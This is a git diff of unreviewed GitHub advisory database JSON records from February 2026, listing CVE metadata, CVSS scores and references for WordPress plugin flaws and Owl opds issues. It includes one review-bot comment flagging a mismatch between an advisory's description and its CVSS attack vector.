+ ],
+ "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ExpressTech Systems Quiz And Survey Master quiz-master-next allows SQL Injection.This issue affects Quiz And Survey Master: from n/a through <= 10.3.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67987"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/quiz-master-next/vulnerability/wordpress-quiz-and-survey-master-plugin-10-3-1-sql-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:04Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-988g-r4v6-j68v/GHSA-988g-r4v6-j68v.json b/advisories/unreviewed/2026/02/GHSA-988g-r4v6-j68v/GHSA-988g-r4v6-j68v.json
new file mode 100644
index 0000000000000..115a062a93106
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-988g-r4v6-j68v/GHSA-988g-r4v6-j68v.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-988g-r4v6-j68v",
+ "modified": "2026-02-20T18:31:39Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2026-26100"
+ ],
+ "details": "Incorrect Permission Assignment for Critical Resource in Owl opds 2.2.0.4 allows File Manipulation via a crafted network request.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26100"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26100"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-732"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T17:25:54Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-9crc-72v8-4jmj/GHSA-9crc-72v8-4jmj.json b/advisories/unreviewed/2026/02/GHSA-9crc-72v8-4jmj/GHSA-9crc-72v8-4jmj.json
new file mode 100644
index 0000000000000..0f0f63b97d391
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-9crc-72v8-4jmj/GHSA-9crc-72v8-4jmj.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9crc-72v8-4jmj",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-68549"
+ ],
+ "details": "Unrestricted Upload of File with Dangerous Type vulnerability in zozothemes Wiguard wiguard allows Upload a Web Shell to a Web Server.This issue affects Wiguard: from n/a through < 2.0.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68549"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/wiguard/vulnerability/wordpress-wiguard-theme-2-0-1-arbitrary-file-upload-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-434"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:12Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json b/advisories/unreviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json
new file mode 100644
index 0000000000000..e7ae460c93780
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json
@@ -0,0 +1,33 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9jmq-xgjm-p8c2",
+ "modified": "2026-02-20T18:31:33Z",
+ "published": "2026-02-20T18:31:33Z",
+ "aliases": [
+ "CVE-2025-67438"
+ ],
+ "details": "A Stored Cross-Site Scripting (XSS) vulnerability in Sync-in Server before 1.9.3 allows an authenticated attacker to execute arbitrary JavaScript in a victim's browser. By uploading a crafted SVG file containing a malicious payload, an attacker can access and exfiltrate sensitive information, including the user's session cookies.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67438"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gist.github.com/x0root/86db30af91bb0e1707eb7e57a049b6ad"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Sync-in/server/releases/tag/v1.9.3"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-9mr9-pcmg-4xr7/GHSA-9mr9-pcmg-4xr7.json b/advisories/unreviewed/2026/02/GHSA-9mr9-pcmg-4xr7/GHSA-9mr9-pcmg-4xr7.json
new file mode 100644
index 0000000000000..9544e750c3d97
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-9mr9-pcmg-4xr7/GHSA-9mr9-pcmg-4xr7.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9mr9-pcmg-4xr7",
+ "modified": "2026-02-20T18:31:33Z",
+ "published": "2026-02-20T18:31:33Z",
+ "aliases": [
+ "CVE-2025-53237"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Soflyy WP Wizard Cloak wp-wizard-cloak allows Reflected XSS.This issue affects WP Wizard Cloak: from n/a through <= 1.0.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53237"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/wp-wizard-cloak/vulnerability/wordpress-wp-wizard-cloak-plugin-1-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-9vr5-8j2w-55f6/GHSA-9vr5-8j2w-55f6.json b/advisories/unreviewed/2026/02/GHSA-9vr5-8j2w-55f6/GHSA-9vr5-8j2w-55f6.json
new file mode 100644
index 0000000000000..dae6fc770a976
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-9vr5-8j2w-55f6/GHSA-9vr5-8j2w-55f6.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9vr5-8j2w-55f6",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-68895"
+ ],
+ "details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in ahachat AhaChat Messenger Marketing ahachat-messenger-marketing allows Password Recovery Exploitation.This issue affects AhaChat Messenger Marketing: from n/a through <= 1.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68895"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/ahachat-messenger-marketing/vulnerability/wordpress-ahachat-messenger-marketing-plugin-1-1-broken-authentication-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-288"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-9w4h-qf26-hvrv/GHSA-9w4h-qf26-hvrv.json b/advisories/unreviewed/2026/02/GHSA-9w4h-qf26-hvrv/GHSA-9w4h-qf26-hvrv.json
new file mode 100644
index 0000000000000..10798f0533acb
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-9w4h-qf26-hvrv/GHSA-9w4h-qf26-hvrv.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9w4h-qf26-hvrv",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69326"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Basix NEX-Forms nex-forms-express-wp-form-builder allows Reflected XSS.This issue affects NEX-Forms: from n/a through <= 9.1.7.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69326"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/nex-forms-express-wp-form-builder/vulnerability/wordpress-nex-forms-plugin-9-1-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:19Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-c27m-jc6r-9c95/GHSA-c27m-jc6r-9c95.json b/advisories/unreviewed/2026/02/GHSA-c27m-jc6r-9c95/GHSA-c27m-jc6r-9c95.json
new file mode 100644
index 0000000000000..ff235846f75f7
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-c27m-jc6r-9c95/GHSA-c27m-jc6r-9c95.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c27m-jc6r-9c95",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-22356"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Automattic Jetpack CRM zero-bs-crm allows PHP Local File Inclusion.This issue affects Jetpack CRM: from n/a through <= 6.7.0.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22356"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/zero-bs-crm/vulnerability/wordpress-jetpack-crm-plugin-6-7-0-local-file-inclusion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:34Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-c29h-3pp8-76hf/GHSA-c29h-3pp8-76hf.json b/advisories/unreviewed/2026/02/GHSA-c29h-3pp8-76hf/GHSA-c29h-3pp8-76hf.json
new file mode 100644
index 0000000000000..098309a177e53
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-c29h-3pp8-76hf/GHSA-c29h-3pp8-76hf.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c29h-3pp8-76hf",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-68051"
+ ],
+ "details": "Authorization Bypass Through User-Controlled Key vulnerability in Shiprocket Shiprocket shiprocket allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Shiprocket: from n/a through <= 2.0.8.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68051"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/shiprocket/vulnerability/wordpress-shiprocket-plugin-2-0-8-insecure-direct-object-references-idor-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-639"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-c49j-5m2h-224g/GHSA-c49j-5m2h-224g.json b/advisories/unreviewed/2026/02/GHSA-c49j-5m2h-224g/GHSA-c49j-5m2h-224g.json
new file mode 100644
index 0000000000000..9fcc4765a442d
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-c49j-5m2h-224g/GHSA-c49j-5m2h-224g.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c49j-5m2h-224g",
+ "modified": "2026-02-20T18:31:39Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-22380"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes UnlimHost unlimhost allows PHP Local File Inclusion.This issue affects UnlimHost: from n/a through <= 1.2.3.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22380"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/unlimhost/vulnerability/wordpress-unlimhost-theme-1-2-3-local-file-inclusion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:37Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-c4mr-3p9j-gxmj/GHSA-c4mr-3p9j-gxmj.json b/advisories/unreviewed/2026/02/GHSA-c4mr-3p9j-gxmj/GHSA-c4mr-3p9j-gxmj.json
index 3d8c35e0da439..84dd165c9d821 100644
--- a/advisories/unreviewed/2026/02/GHSA-c4mr-3p9j-gxmj/GHSA-c4mr-3p9j-gxmj.json
+++ b/advisories/unreviewed/2026/02/GHSA-c4mr-3p9j-gxmj/GHSA-c4mr-3p9j-gxmj.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-c4mr-3p9j-gxmj",
- "modified": "2026-02-19T18:31:52Z",
+ "modified": "2026-02-20T18:31:27Z",
 "published": "2026-02-19T18:31:52Z",
 "aliases": [
 "CVE-2026-25322"
 ],
 "details": "Cross-Site Request Forgery (CSRF) vulnerability in PublishPress PublishPress Revisions revisionary allows Cross Site Request Forgery.This issue affects PublishPress Revisions: from n/a through <= 3.7.22.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-352" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:16Z" diff --git a/advisories/unreviewed/2026/02/GHSA-c4qg-fgx5-7xg5/GHSA-c4qg-fgx5-7xg5.json b/advisories/unreviewed/2026/02/GHSA-c4qg-fgx5-7xg5/GHSA-c4qg-fgx5-7xg5.json new file mode 100644 index 0000000000000..9e49477964163 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c4qg-fgx5-7xg5/GHSA-c4qg-fgx5-7xg5.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c4qg-fgx5-7xg5", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26722" + ], + "details": "An issue in Key Systems Inc Global Facilities Management Software v.20230721a allows a remote attacker to escalate privileges via PIN component of the login functionality.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26722" + }, + { + "type": "WEB", + "url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2026-26722" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c88w-mqr9-prrr/GHSA-c88w-mqr9-prrr.json b/advisories/unreviewed/2026/02/GHSA-c88w-mqr9-prrr/GHSA-c88w-mqr9-prrr.json new file mode 100644 index 0000000000000..9f40ad52bc1e2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c88w-mqr9-prrr/GHSA-c88w-mqr9-prrr.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c88w-mqr9-prrr", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2024-54222" + ], + "details": "Missing Authorization vulnerability in Seraphinite Solutions Seraphinite Accelerator seraphinite-accelerator allows Retrieve Embedded Sensitive Data.This issue affects Seraphinite Accelerator: from n/a through <= 2.22.15.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-54222" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/seraphinite-accelerator/vulnerability/wordpress-seraphinite-accelerator-plugin-2-22-15-authenticated-sensitive-data-exposure-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cchw-3fjc-4266/GHSA-cchw-3fjc-4266.json b/advisories/unreviewed/2026/02/GHSA-cchw-3fjc-4266/GHSA-cchw-3fjc-4266.json index 68c31a69c9abb..77b7381f9b8c3 100644 --- a/advisories/unreviewed/2026/02/GHSA-cchw-3fjc-4266/GHSA-cchw-3fjc-4266.json +++ b/advisories/unreviewed/2026/02/GHSA-cchw-3fjc-4266/GHSA-cchw-3fjc-4266.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-cchw-3fjc-4266", - "modified": "2026-02-19T18:31:53Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:53Z", "aliases": [ "CVE-2026-25412" ], "details": "Missing Authorization vulnerability in mdempfle Advanced iFrame advanced-iframe allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Advanced iFrame: from n/a through <= 2025.10.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:23Z" diff --git a/advisories/unreviewed/2026/02/GHSA-cf7g-cxh2-5vhr/GHSA-cf7g-cxh2-5vhr.json b/advisories/unreviewed/2026/02/GHSA-cf7g-cxh2-5vhr/GHSA-cf7g-cxh2-5vhr.json new file mode 100644 index 0000000000000..c5396f9e05c4d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cf7g-cxh2-5vhr/GHSA-cf7g-cxh2-5vhr.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cf7g-cxh2-5vhr", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67975" + ], + "details": "Missing Authorization vulnerability in aDirectory aDirectory adirectory allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects aDirectory: from n/a through <= 3.0.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67975" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/adirectory/vulnerability/wordpress-adirectory-plugin-3-0-3-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cg8f-pcpw-6836/GHSA-cg8f-pcpw-6836.json b/advisories/unreviewed/2026/02/GHSA-cg8f-pcpw-6836/GHSA-cg8f-pcpw-6836.json new file mode 100644 index 0000000000000..d7c67a0e2419f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cg8f-pcpw-6836/GHSA-cg8f-pcpw-6836.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cg8f-pcpw-6836", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-52744" + ], + "details": "Improper Control of Generation of Code ('Code Injection') vulnerability in inpersttion Inpersttion For Theme err-our-team allows Code Injection.This issue affects Inpersttion For Theme: from n/a through <= 1.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52744" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/err-our-team/vulnerability/wordpress-inpersttion-for-theme-plugin-1-0-arbitrary-code-execution-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-chqg-r72f-gcgr/GHSA-chqg-r72f-gcgr.json b/advisories/unreviewed/2026/02/GHSA-chqg-r72f-gcgr/GHSA-chqg-r72f-gcgr.json new file mode 100644 index 0000000000000..bdb04dc312b7e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-chqg-r72f-gcgr/GHSA-chqg-r72f-gcgr.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-chqg-r72f-gcgr", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24953" + ], + "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Mitchell Bennis Simple File List simple-file-list allows Path Traversal.This issue affects Simple File List: from n/a through <= 6.1.15.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24953" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/simple-file-list/vulnerability/wordpress-simple-file-list-plugin-6-1-15-arbitrary-file-download-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cjp5-2c5h-3735/GHSA-cjp5-2c5h-3735.json b/advisories/unreviewed/2026/02/GHSA-cjp5-2c5h-3735/GHSA-cjp5-2c5h-3735.json new file mode 100644 index 0000000000000..baf310fe1b0aa --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cjp5-2c5h-3735/GHSA-cjp5-2c5h-3735.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cjp5-2c5h-3735", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26099" + ], + "details": "Uncontrolled Search Path Element in Owl opds 2.2.0.4 allows Leveraging/Manipulating Configuration File Search Paths via a crafted network request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26099" + }, + { + "type": "WEB", + "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26099" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cm5v-8jg4-g44j/GHSA-cm5v-8jg4-g44j.json b/advisories/unreviewed/2026/02/GHSA-cm5v-8jg4-g44j/GHSA-cm5v-8jg4-g44j.json new file mode 100644 index 0000000000000..9d852c2bd2f5b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cm5v-8jg4-g44j/GHSA-cm5v-8jg4-g44j.json 
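Review bot: The `details` text of GHSA-cjp5-2c5h-3735 says the issue is reached "via a crafted network request", but the CVSS_V4 vector added next to it begins `AV:L/AC:L/AT:N/PR:H`, that is, a local attack vector with high privileges required. The record therefore gives consumers two different pictures of exposure. The same wording and the same vector appear in GHSA-gcfc-fjf7-2pj9 (CVE-2026-26097) later in this patch. Because `affected` is empty and `database_specific.severity` is `HIGH`, triage will rest on the vector alone, so it is worth confirming against the referenced nozominetworks.com advisory which reading is intended before the record is reviewed.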
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cm5v-8jg4-g44j", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68028" + ], + "details": "Missing Authorization vulnerability in Passionate Brains GA4WP: Google Analytics for WordPress ga-for-wp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects GA4WP: Google Analytics for WordPress: from n/a through <= 2.10.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68028" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/ga-for-wp/vulnerability/wordpress-ga4wp-google-analytics-for-wordpress-plugin-2-10-0-broken-access-control-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cq45-jm56-f2cg/GHSA-cq45-jm56-f2cg.json b/advisories/unreviewed/2026/02/GHSA-cq45-jm56-f2cg/GHSA-cq45-jm56-f2cg.json new file mode 100644 index 0000000000000..a6eb7b1c9d3c5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cq45-jm56-f2cg/GHSA-cq45-jm56-f2cg.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cq45-jm56-f2cg", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22367" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Coworking coworking allows PHP Local File Inclusion.This issue affects Coworking: from n/a through <= 1.6.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22367" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/coworking/vulnerability/wordpress-coworking-theme-1-6-1-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-crh6-h7h3-f48v/GHSA-crh6-h7h3-f48v.json b/advisories/unreviewed/2026/02/GHSA-crh6-h7h3-f48v/GHSA-crh6-h7h3-f48v.json new file mode 100644 index 0000000000000..d5be2fb4ee203 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-crh6-h7h3-f48v/GHSA-crh6-h7h3-f48v.json 
